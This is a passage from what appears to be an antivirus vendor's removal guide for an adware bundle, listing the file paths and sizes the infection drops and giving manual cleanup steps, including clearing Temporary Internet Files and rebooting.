    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
    %Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
    %Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
    %Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
    %Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
    %Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
    %Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)
    %Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
